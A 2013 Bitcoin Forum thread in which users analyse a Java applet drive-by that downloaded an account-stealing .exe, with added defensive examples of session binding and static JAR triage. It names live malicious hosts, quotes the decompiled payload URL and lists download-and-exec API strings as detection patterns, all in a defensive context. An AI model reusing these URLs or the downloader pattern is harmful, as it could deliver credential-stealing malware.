Bitcoin Forum

Other => Meta => Topic started by: theymos on June 07, 2013, 07:42:02 PM



Title: How does this Java exploit work?
Post by: theymos on June 07, 2013, 07:42:02 PM
The Java applet on this page is somehow being used to take control of forum accounts. Exactly how does this work? Is it a 0-day Java exploit, or some inherent security weakness in Java? Is there anything that can be done on my end to stop it?

(Proceed with caution) zerohedge.us/Mark-Zuckerberg-talks-about-Bitcoin.htm


Title: Re: How does this Java exploit work?
Post by: malevolent on June 07, 2013, 07:50:32 PM
Are you 100% sure it is from this page? Very recently I also visited this page and was close to allowing it to run (at the same time also being logged in to this forum) because I have visited that site frequently in the past and thought it was 'legit'. Fortunately I restrained myself from running it :P

I will give it a try on a VM, though not sure if it will work as it should.


Title: Re: How does this Java exploit work?
Post by: theymos on June 07, 2013, 07:53:47 PM
That's not actually Zero Hedge. It's a phishing-type site.

Quote
Are you 100% sure it is from this page?

No.


Title: Re: How does this Java exploit work?
Post by: escrow.ms on June 07, 2013, 08:04:36 PM
Normal Java drive-by, nothing else. Probably FUD.

<html>
  <applet width='500' height='500' code="BitcoinMeet.class" archive="BitcoinMeet.jar"> </applet>
</html>

Edit: it's FUD https://www.virustotal.com/en/file/39b5ed1833ac72f79fb042f5fadf3c2352605b3c8cb58842114e77289f033cb8/analysis/1370635717/

and not a normal one. I have reported the site to Google Safe Browsing.

http://www.google.com/safebrowsing/report_badware/

Please report. ^

Edit: It's downloading a file from here:

Warning INFECTED FILE
https://v-panel.info/userAccounts/blackapples/AdobeUpdates DOT exe

Scan: 5/47
https://www.virustotal.com/en/file/79c4e1fa564ba5075fe15b6131202e16631cb1151708d337d2a0455bdbb882ab/analysis/1370636620/
https://malwr.com/analysis/YjAwYjE2MjIzN2Y1NDExYmIyOGRiYzcwZDBlODY0YjE/


You can see at https://v-panel.info/
that this site provides these malicious Java applets for only $20 XD

more info about v-panel
http://www.hackforums.net/archive/index.php/thread-3413390.html
http://blackhatcrackers.blogspot.in/2013/05/java-drive-by-advanced.html


Title: Re: How does this Java exploit work?
Post by: pekv2 on June 07, 2013, 10:04:19 PM
Quote
The Java applet on this page is somehow being used to take control of forum accounts. Exactly how does this work? Is it a 0-day Java exploit, or some inherent security weakness in Java? Is there anything that can be done on my end to stop it?

(Proceed with caution) zerohedge.us/Mark-Zuckerberg-talks-about-Bitcoin.htm

Make sure Java is off in your browsers.

If nothing can be done on theymos's side, probably the best thing to do is put up an alert system here to disable Java for browsers and/or completely remove Java. Because of Java's screw-ups, I've uninstalled that crap. Safer without it than with it.


Title: Re: How does this Java exploit work?
Post by: MysteryMiner on June 08, 2013, 03:20:50 AM
It looks like the Java applet is downloading and launching the executable file. I cannot test whether it is a 0-day exploit or "normal" behaviour of Java because I have fortified my Firefox (Java plugin disabled) but have not installed a VMware machine with everything left at defaults.

Seems that the .exe is stealing either cookies or saved logins or keylogging passwords. Theymos cannot do anything about it. The forum seems to be configured properly; the users' computers and brains might not be.


Title: Re: How does this Java exploit work?
Post by: escrow.ms on June 08, 2013, 03:29:23 AM
Quote
It looks like the Java applet is downloading and launching the executable file. I cannot test whether it is a 0-day exploit or "normal" behaviour of Java because I have fortified my Firefox (Java plugin disabled) but have not installed a VMware machine with everything left at defaults.

Seems that the .exe is stealing either cookies or saved logins or keylogging passwords. Theymos cannot do anything about it. The forum seems to be configured properly; the users' computers and brains might not be.


Well, 0-day vulnerabilities are used only in costly exploit packs because they run the exe silently; this one was an advanced Java drive-by because it had the exe file link in the jar itself.

I can't say anything about the exe because it seems like it has anti-sandbox/anti-VM enabled; that's why it's not showing any outgoing connections.


Title: Re: How does this Java exploit work?
Post by: MysteryMiner on June 08, 2013, 03:53:13 AM
0-days for Java are usually used to bypass the sandbox or code-signature restrictions. Anyway, I consider it to be a lame exploit because many don't have Java installed or enabled, compared to, let's say, Flash Player, whose 0-day exploit is likely to run code on almost every visitor.


Title: Re: How does this Java exploit work?
Post by: theymos on June 08, 2013, 04:36:34 AM
Quote
0-days for Java are usually used to bypass the sandbox or code-signature restrictions. Anyway, I consider it to be a lame exploit because many don't have Java installed or enabled, compared to, let's say, Flash Player, whose 0-day exploit is likely to run code on almost every visitor.

I've dealt with ~10 people who seem to have fallen victim to this exploit, and many more will have had their accounts compromised without my knowledge. Looks like Java is fairly widespread, even in the Bitcoin community. If this exploit can be used on bigger and more important sites, it seems like a pretty major Java weakness.


Title: Re: How does this Java exploit work?
Post by: John (John K.) on June 08, 2013, 04:37:47 AM
PS: Here's the .jar file itself if I'm not wrong - http://zerohedge.us/BitcoinMeet.jar [WARNING VIRUS/TROJAN/]


Title: Re: How does this Java exploit work?
Post by: 🏰 TradeFortress 🏰 on June 08, 2013, 04:40:59 AM
Invalidate sessions if they come from a different IP range.


Title: Re: How does this Java exploit work?
Post by: Matthew N. Wright on June 08, 2013, 08:03:15 AM
Quote
Invalidate sessions if they come from a different IP range.

That is elementary to security, but it won't happen here because this forum supports TOR usage.


Title: Re: How does this Java exploit work?
Post by: escrow.ms on June 08, 2013, 11:45:15 AM

Quote
That is elementary to security, but it won't happen here because this forum supports TOR usage.

and vpn etc too.


Title: Re: How does this Java exploit work?
Post by: MysteryMiner on June 08, 2013, 07:17:21 PM
Quote
Invalidate sessions if they come from a different IP range.
It will not help. The user will type the password again and the .exe keylogger will intercept that password. The rest is obvious.

I'm more interested in looking at the .exe. To me the .jar seems only like some sort of trojan-downloader that fetches the exe from a remote server and launches it.

There is nothing that the forum owner can realistically do if the user's machine is infected by malware.


Title: Re: How does this Java exploit work?
Post by: Matthew N. Wright on June 08, 2013, 07:20:38 PM
Quote
Invalidate sessions if they come from a different IP range.
It will not help. The user will type the password again and the .exe keylogger will intercept that password. The rest is obvious.

I'm more interested in looking at the .exe. To me the .jar seems only like some sort of trojan-downloader that fetches the exe from a remote server and launches it.

There is nothing that the forum owner can realistically do if the user's machine is infected by malware.

The point would be to stop external logins. This of course, as you said, would not help *if* the infected computer was the one doing the controlling (remote control), and not just sending login credentials to an external site.


Title: Re: How does this Java exploit work?
Post by: MysteryMiner on June 08, 2013, 07:37:29 PM

Quote
The point would be to stop external logins. This of course, as you said, would not help *if* the infected computer was the one doing the controlling (remote control), and not just sending login credentials to an external site.
It will hurt Tor users because their IP changes constantly. It will not stop the hacker if the .exe opens a SOCKS proxy on the infected computer (most new trojans do that). And even if it does not, the hacker can still log in from another IP when the victim is away.


Title: Re: How does this Java exploit work?
Post by: Matthew N. Wright on June 08, 2013, 07:44:05 PM
Quote
can log in from another IP when the victim is away.

This of course is the loophole in that solution. The person would literally need to DoS the forums by mashing F5 in order to keep another entity out (and in turn log themselves out in the process, giving a window of opportunity to the hacker).

Not really the best solution for a forum I suppose. PGP keys required for logging in might be smarter.


Title: Re: How does this Java exploit work?
Post by: MysteryMiner on June 08, 2013, 08:00:28 PM
Quote
PGP keys required for logging in might be smarter.
And exactly what prevents the malware from stealing the PGP keys from the computer and the passphrase to unlock them? Even keys stored on a smartcard are not bulletproof; the malware can intercept and modify the computer-smartcard communication. This will require additional programming but is not unrealistic.

The server's job is to keep the forum accessible with proper credentials and keep the safe on the server side. The user's job is to keep his computer secure. This malware is targeting the user and the server cannot do anything about it.


Title: Re: How does this Java exploit work?
Post by: rme on June 08, 2013, 08:18:36 PM
Google 2FA + Invalidate session if ip or user agent changes (optional but activated by default).
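The session-binding check that TradeFortress and rme propose, written out as an added example (this is not the forum's own session code, and the Session shape, the policy names, the User-Agent strings and the RFC 5737 documentation addresses are all constructed here). It records the IP and User-Agent at login and rejects a later request presenting the same cookie from a different IP range or browser:

```python
"""Session binding: invalidate a session when the client's IP range or User-Agent
changes. Added example, not the forum's own session code; the Session shape,
policy names, User-Agent strings and addresses (RFC 5737 documentation ranges)
are constructed for illustration."""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Session:
    user: str
    ip: str          # address seen at login
    user_agent: str  # User-Agent seen at login


def same_range(ip_a: str, ip_b: str, v4_prefix: int = 24, v6_prefix: int = 64) -> bool:
    """True if both addresses fall in the same /24 (IPv4) or /64 (IPv6)."""
    a, b = ipaddress.ip_address(ip_a), ipaddress.ip_address(ip_b)
    if a.version != b.version:
        return False
    prefix = v4_prefix if a.version == 4 else v6_prefix
    return (ipaddress.ip_network(f"{a}/{prefix}", strict=False)
            == ipaddress.ip_network(f"{b}/{prefix}", strict=False))


def session_valid(session: Session, ip: str, user_agent: str, policy: str = "range") -> bool:
    """Decide whether a request presenting this session cookie may continue.

    policy: "none"   - the cookie alone is enough (what a stolen cookie exploits)
            "ua"     - User-Agent must match the one seen at login
            "range"  - same IP range (see same_range) and same User-Agent
            "strict" - exact IP and User-Agent match
    """
    if policy == "none":
        return True
    if policy == "ua":
        return session.user_agent == user_agent
    if policy == "range":
        return same_range(session.ip, ip) and session.user_agent == user_agent
    if policy == "strict":
        return session.ip == ip and session.user_agent == user_agent
    raise ValueError(f"unknown policy {policy!r}")


UA_FF = "Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0"
UA_CHROME = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 Chrome/27.0 Safari/537.36"


def scenarios(policy: str) -> dict:
    """Constructed requests replayed against one login session under a policy."""
    victim = Session("victim", "203.0.113.10", UA_FF)
    return {
        # victim's DHCP lease moved, still inside the same /24
        "victim_same_network": session_valid(victim, "203.0.113.55", UA_FF, policy),
        # victim on Tor: the next circuit exits from a different network
        "tor_exit_change": session_valid(victim, "198.51.100.7", UA_FF, policy),
        # stolen cookie replayed from the attacker's machine and browser
        "stolen_cookie_replay": session_valid(victim, "192.0.2.99", UA_CHROME, policy),
        # same replay, but the attacker copied the victim's User-Agent string
        "stolen_cookie_ua_copied": session_valid(victim, "192.0.2.99", UA_FF, policy),
    }


if __name__ == "__main__":
    for p in ("none", "ua", "range", "strict"):
        print(p, scenarios(p))
```

Running the four scenarios shows the trade-off the thread is arguing over: the "range" policy kills a replayed cookie from another network even when the attacker copies the User-Agent, but it also logs out the Tor user every time the circuit exit changes, and "ua" alone stops nothing once the attacker copies the string. It does not address the case MysteryMiner raises: an attacker with the keylogged password simply logs in fresh, and one who proxies through a SOCKS server on the victim's own box arrives from the bound IP and passes the check.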


Title: Re: How does this Java exploit work?
Post by: MysteryMiner on June 08, 2013, 08:58:48 PM
Quote
Google 2FA + Invalidate session if ip or user agent changes (optional but activated by default).
This forum account is not that important to require two-factor authorization. The most that someone with a stolen account can do is post Hello.jpg everywhere (and sometimes even the original owner will do it) and social-engineer other users.

report of AV scan: http://virusscan.jotti.org/en/scanresult/847cdfd36a7fd35514f569396916e78e60464ef5

We see how "efficient" the antivirus software is compared to technical knowledge.

And who makes antivirus called CP Secure? Antivirus for pedophiles?


Title: Re: How does this Java exploit work?
Post by: ecliptic on June 08, 2013, 11:25:19 PM
java exploit? smug gnu/linux user not affected.jpg


Title: Re: How does this Java exploit work?
Post by: ecliptic on June 08, 2013, 11:27:21 PM
funny

whois zerohedge.us

Billing Contact ID:                          EDD09205F595F517
Billing Contact Name:                        news manso
Billing Contact Organization:                sdgsdgsdg
Billing Contact Address1:                    dfhfdh
Billing Contact Address2:                    fdhhdfh
Billing Contact City:                        new york
Billing Contact State/Province:              NY
Billing Contact Postal Code:                 10001
Billing Contact Country:                     United States
Billing Contact Country Code:                US
Billing Contact Phone Number:                +1.987654321
Billing Contact Email:                       blackapples@yahoo.com



the root page is just an index of

'blackapples' is also in the .jar exploit code

Quote
String Vd8laZ87XmxGrUjwe3dbIxht7KOcymtjDHkR2rXZ1gKsBJA6M5gnIe3OxQHWXUVygIbhTAXU73OWLiEq3ZjLU3sccTABokQl = "https://v-panel.info/userAccounts/blackapples/AdobeUpdates.exe";

however v-panel.info seems to be down
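The thread's conclusion (escrow.ms: "it had exe file link in jar itself"; ecliptic: the URL string sits in the decompiled class next to a random variable name) is exactly what a static triage of the JAR should surface. The following is an added example, not code from the thread or from whoever built the applet. BitcoinMeet.jar itself is not on this page, so `build_sample_jar()` constructs a stand-in whose .class entry carries the same kind of constant-pool strings a decompiler recovers from a download-and-launch stub: the hard-coded .exe URL plus the java.net/java.io/Runtime references. The "signed" check assumes the applet shipped a signature block in META-INF, which is what makes Java show the "allow?" prompt malevolent mentions rather than confine it to the sandbox; that is an assumption, since the real JAR was not examined here. A sample that encodes or splits its strings would slip past this check, which only looks for literals.

```python
"""Static triage of a suspicious applet JAR.

Added example, not code from the forum thread or from the applet's author.
BitcoinMeet.jar is not on the page, so build_sample_jar() constructs a stand-in
whose .class entry carries the strings the decompiled applet showed: a
hard-coded URL to an .exe plus the class references a downloader stub needs.
"""
import io
import re
import zipfile

# Printable-ASCII URL literals; a NUL (class-file padding/constant-pool framing) ends the match.
URL_RE = re.compile(rb"https?://[\x21-\x7e]+")

# Class references / method names that together make a downloader: fetch a URL,
# write it to disk, hand it to Runtime.exec or ProcessBuilder.
SUSPICIOUS_API = (b"java/net/URL", b"java/io/FileOutputStream",
                  b"java/lang/Runtime", b"exec", b"java/lang/ProcessBuilder")

# Signature-block entries a signed JAR carries in META-INF/.
SIGNATURE_SUFFIXES = (".RSA", ".DSA", ".EC")


def build_sample_jar() -> bytes:
    """Constructed sample. The .class bytes are NOT a valid class file: only the
    magic number plus the strings a decompiler would recover from the real one."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        # Placeholder signature block (assumption: the real applet was signed), not real PKCS#7.
        zf.writestr("META-INF/APPLET.RSA", b"\x30\x82" + b"\x00" * 16)
        fake_class = (
            b"\xca\xfe\xba\xbe\x00\x00\x00\x33"
            b"\x00https://v-panel.info/userAccounts/blackapples/AdobeUpdates.exe"
            b"\x00java/net/URL\x00java/io/FileOutputStream"
            b"\x00java/lang/Runtime\x00exec\x00"
        )
        zf.writestr("BitcoinMeet.class", fake_class)
    return buf.getvalue()


def build_benign_jar() -> bytes:
    """Constructed control: a manifest and a class with no network or exec strings."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("Hello.class", b"\xca\xfe\xba\xbe\x00\x00\x00\x33\x00java/lang/String\x00")
    return buf.getvalue()


def triage_jar(jar_bytes: bytes) -> dict:
    """Scan every entry and return the indicators found plus a coarse verdict."""
    report = {"entries": [], "signed": False, "urls": [], "apis": {}}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for name in zf.namelist():
            report["entries"].append(name)
            if name.startswith("META-INF/") and name.upper().endswith(SIGNATURE_SUFFIXES):
                report["signed"] = True  # signed applet: user gets an allow prompt, not the sandbox
            data = zf.read(name)
            for url in URL_RE.findall(data):
                report["urls"].append(url.decode("ascii", "replace"))
            for api in SUSPICIOUS_API:
                if api in data:
                    report["apis"].setdefault(api.decode(), []).append(name)
    apis = report["apis"]
    report["exe_urls"] = [u for u in report["urls"] if u.lower().endswith(".exe")]
    launches = ("java/lang/Runtime" in apis and "exec" in apis) or "java/lang/ProcessBuilder" in apis
    fetches = "java/net/URL" in apis and "java/io/FileOutputStream" in apis
    if report["exe_urls"] and launches:
        report["verdict"] = "likely trojan-downloader"
    elif report["exe_urls"] or launches or fetches:
        report["verdict"] = "suspicious"
    else:
        report["verdict"] = "no downloader indicators"
    return report


if __name__ == "__main__":
    r = triage_jar(build_sample_jar())
    print(r["verdict"], "signed:", r["signed"], r["exe_urls"], sorted(r["apis"]))
    print(triage_jar(build_benign_jar())["verdict"])
```

The same scan works on a real JAR by passing the file's bytes to `triage_jar`; the constant-pool strings survive the kind of identifier obfuscation seen in the thread, because renaming a variable does not touch the string literal it holds.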


Title: Re: How does this Java exploit work?
Post by: ironcross360 on June 10, 2013, 01:50:03 AM
Something weird is going on this forum... Theymos needs to find more about it.


Title: Re: How does this Java exploit work?
Post by: MysteryMiner on June 10, 2013, 01:55:35 AM
Quote
java exploit? smug gnu/linux user not affected.jpg
NIX is just as much affected. Java runs on Linux too. But the main payload .exe does not :D
Quote
Something weird is going on this forum... Theymos needs to find more about it.
I feel weird too. Just smoked large bong with weed and something feels weird about this forum. Theymos must do something!